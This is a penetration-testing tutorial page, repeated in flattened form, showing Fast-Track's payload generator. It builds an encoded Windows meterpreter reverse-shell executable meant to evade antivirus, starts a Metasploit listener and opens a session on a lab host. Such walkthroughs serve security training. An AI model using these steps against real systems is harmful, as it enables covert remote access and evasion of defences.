Payload Generator

The Fast Track Payload Generator will create custom Metasploit Payloads for you with a click of a button. Often though, remembering the commands with msfpayload can be tricky but Fast-Track's Payload Generator simplifies it for you!

Fast-Track Main Menu:

    Fast-Track - Where it's OK to finish in under 3 minutes...
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Microsoft SQL Tools
    4.  Mass Client-Side Attack
    5.  Exploits
    6.  Binary to Hex Payload Converter
    7.  Payload Generator
    8.  Fast-Track Tutorials
    9.  Fast-Track Changelog
    10. Fast-Track Credits
    11. Exit

    Enter the number: 7
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.

#####################################
###                               ###
### Metasploit Payload Generator  ###
###                               ###
### Written by: Dave Kennedy      ###
### aka ReL1K                     ###
###                               ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.


What payload do you want to generate:

Name:                                Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC          Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter  Spawn a Meterpreter shell on victim through Reflective to attacker.

Enter choice (example 1-6): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 9090

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 310
Options: LHOST=10.211.55.130,LPORT=9090,ENCODING=shikata_ga_nai


A payload has been created in this directory and is named 'payload.exe'. Enjoy!


Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Notice that once the payload is created, Fast-Track can automatically set up a listener for you to accept the connection. Now all you have to do is get the executable on the remote system itself. Once executed:

***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1078)

meterpreter >

We just learned how to easily create payloads using the Fast-Track framework and ultimately gain access to a system using a custom-created payload through the Metasploit Framework!

© Offensive Security 2009

Payload Generator

Fast-Track Main Menu: Fast-Track - Where it's OK to finish in under 3 minutes... Version: v4.0 Written by: David Kennedy (ReL1K) http://www.securestate.com http://www.thepentest.com 1. Fast-Track Updates 2. Autopwn Automation 3. Microsoft SQL Tools 4. Mass Client-Side Attack 5. Exploits 6. Binary to Hex Payload Converter 7. Payload Generator 8. Fast-Track Tutorials 9. Fast-Track Changelog 10. Fast-Track Credits 11. Exit Enter the number: 7 Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. ##################################### ### ### ### Metasploit Payload Generator ### ### ### ### Written by: Dave Kennedy ### ### aka ReL1K ### ### ### ##################################### ##################################### The Metasploit Payload Generator is a simple tool to make it extremely easy to generate a payload and listener on the Metasploit framework. This does not actually exploit any systems, it will generate a metasploit payload for you and save it to an executable. You then need to someone get it on the remote server by yourself and get it to execute correctly. This will also encode your payload to get past most AV and IDS/IPS. What payload do you want to generate: Name: Description: 1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker. 2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker. 3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker. 4. Windows Bind Shell Execute payload and create an accepting port on remote system. 5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker. 6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker. Enter choice (example 1-6): 2 Below is a list of encodings to try and bypass AV. Select one of the below, Avoid_UTF8_tolower usually gets past them. 1. avoid_utf8_tolower 2. shikata_ga_nai 3. alpha_mixed 4. alpha_upper 5. call4_dword_xor 6. countdown 7. fnstenv_mov 8. jmp_call_additive 9. nonalpha 10. nonupper 11. unicode_mixed 12. unicode_upper 13. alpha2 14. No Encoding Enter your choice : 2 Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130 Enter the port of the Listener: 9090 Do you want to create an EXE or Shellcode 1. Executable 2. Shellcode Enter your choice: 1 Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 310 Options: LHOST=10.211.55.130,LPORT=9090,ENCODING=shikata_ga_nai A payload has been created in this directory and is named 'payload.exe'. Enjoy! Do you want to start a listener to receive the payload yes or no: yes Launching Listener... *********************************************************************************************** Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp' Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai *********************************************************************************************** [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler...

*********************************************************************************************** Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp' Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai *********************************************************************************************** [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1078) meterpreter >

Username
Password
Remember me

System message

Payload Generator

Payload Generator